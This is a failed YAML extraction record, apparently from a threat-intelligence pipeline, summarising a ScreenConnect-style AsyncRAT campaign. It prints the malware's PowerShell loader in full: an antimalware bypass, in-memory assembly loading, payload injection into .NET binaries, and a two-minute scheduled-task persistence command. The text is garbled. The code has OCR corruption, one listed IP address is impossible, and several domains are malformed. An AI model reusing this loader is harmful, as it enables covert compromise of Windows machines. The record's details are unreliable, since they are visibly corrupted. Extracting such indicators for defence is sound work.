# Failed YAML extraction
# Timestamp: 2026-05-01T17:44:42.341515
# Response length: 4184 chars
# Input chunk preview: '.ps1 =2 235 KB Jun-02-2025 08:09:59 AttackCaptureTM vOverview http://164.68.120.30:550/99/Skype.ps1 23] 3KB May-29-2025 07:05:27ListingExplore Threat Actors >@ 10C Hunter >7 Phishing >& Malwarev=== Im'
# ============================================================

title: "ScreenConnect-Style Malware Campaign Analysis"
description: A campaign involving weaponized shortcuts and PowerShell scripts that bypasses AV, establishes persistence via scheduled tasks, and downloads payloads from compromised servers.
attribution: ""
malware_families:
  - AsyncRAT
cves: []
ttps:
  processes:
    - powershell.exe
    - wscript.exe
  command_lines:
    - "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Public\Skype.ps1"
    - "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command {base64-encoded-script}"
    - "schtasks /create /tn \"SystenInstallTask\" /tr \"C:\\Users\\Public\\Ab.vbs\" /sc MINUTE /mo 2"
  powershell:
    - "[Byte[]]$payload = $a | foreach-Object {[double]($_/10))}[String] $path = \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\"[string] $path2 = \"C:\\Users\\PubLic\\ibPK.dll\"$assembly = @*using System;using System.Runtime.InteropServices;using System.Text;using System.IO;namespace Tnject{public static class Program{[DllImport(\"$path2\", EntryPoint = \"Execute\", CharSet = CharSet.Auto)]static extern int Execute(byte[] path, int sizePath, byte[] raubata);public static void Run(byte[] raudata, string patn){byte[] Pathytes = Encoding.UTF8.GetBytes(path);Execute(PathBytes, PathBytes.Length, rawbata);}}*Add-Type -TypeDefinition $Assembly[Inject.Program]::Run($payload, $path)Sleep 8schtasks /create /tn \"SystenInstallTask\" /tr \"C:\\Users\\Public\\Ab.vbs\" /sc MINUTE /mo 2"
    - "if (Test-Path \"C:\\Program Files (x86)\\TotalAV\") { $asm = '[System.' + 'Reflection' + '.Assembly]' | iex [Byte[]]$V_rrl = (Get-Content \"C:\\ProgramData\\pe.txt\").Split(',') | foreach-Object {[double]($_/10)} $asm::Load([byte[]]($V_rr1)).GetType('AnsiAnti' + 'Malware' + 'Provider' + '.BypassIt').GetMethod('Exe' + 'cute').Invoke($null, $null) $a = (Get-Content \"C:\\ProgramData\\l.txt\").Split(',') | foreach-Object {[double]($_/10)} [Byte[]]$V_rr = $a '$asm::Load($V_rr)' + '.EntryPoint' + '.Invoke($null, $null) | iex } elseif (Test-Path \"C:\\Program Files\\Avast Software\\Avast\") { $asm = '[System.' + 'Reflection' + '.Assembly]' | iex [Byte[]]$V_rrl = (Get-Content \"C:\\ProgramData\\pe.txt\").Split(',') | foreach-Object {[double]($_/10)} $asm::Load([byte[]]($V_rr1)).GetType('AnsiAnti' + 'Malware' + 'Provider' + '.BypassIt').GetMethod('Exe' + 'cute').Invoke($null, $null) $a = (Get-Content \"C:\\ProgramData\\l.txt\").Split(',') | foreach-Object {[double]($_/10)} [Byte[]]$V_rr = $a '$asm::Load($V_rr)' + '.EntryPoint' + '.Invoke($null, $null) | iex } else { $a = (Get-Content \"C:\\ProgramData\\l.txt\").Split(',') | foreach-Object {[double]($_/10)} [Byte[]]$payload = $a [String] $path = \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\" [string] $path2 = \"C:\\ProgramData\\libPK.dll\" $assembly = @*using System; using System.Runtime.InteropServices; using System.Text; using System.IO; namespace Inject { public static class Program { [DllImport(\"$path2\", EntryPoint = \"Execute\", CharSet = CharSet.Auto)] static extern int Execute(byte[] path, int sizePath, byte[] rawData); public static void Run(byte[] rawData, string path) { byte[] Pathytes = Encoding.UTF8.GetBytes(path); Execute(PathBytes, PathBytes.Length, rawData); } } }*Add-Type -TypeDefinition $Assembly [Inject.Program]::Run($payload, $path)"
  scripts:
    - "ab.vbs"
    - "Skype.ps1"
  registry_keys: []
  image_loads:
    - ibPK.dll
  network_connections:
    - powershell.exe -> galusa.ac.mz[.]pdf:80
    - wscript.exe -> dual.saltuta.com[.]com:80
  file_activity:
    - C:\Users\Public\Microsoft.lnk
    - C:\Users\Public\Skype.ps1
    - C:\ProgramData\pe.txt
    - C:\ProgramData\l.txt
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
    - C:\ProgramData\ibPK.dll
  persistence:
    - Scheduled task named "SystenInstallTask" running every two minutes
  process_relations: []
iocs:
  hashes:
    - []
  ip_addresses:
    - 78.161.142.297
    - 94.154.173.145
    - 176.65.139.119
    - 45.74.16.71
    - 88.229.27.40
    - 176.162.57.179
  domains:
    - galusa.ac.mz
    - dual.saltuta.com
    - verify.uniupdate.net
  urls:
    - hxxps://galusa.ac.mz/pdf
authors: []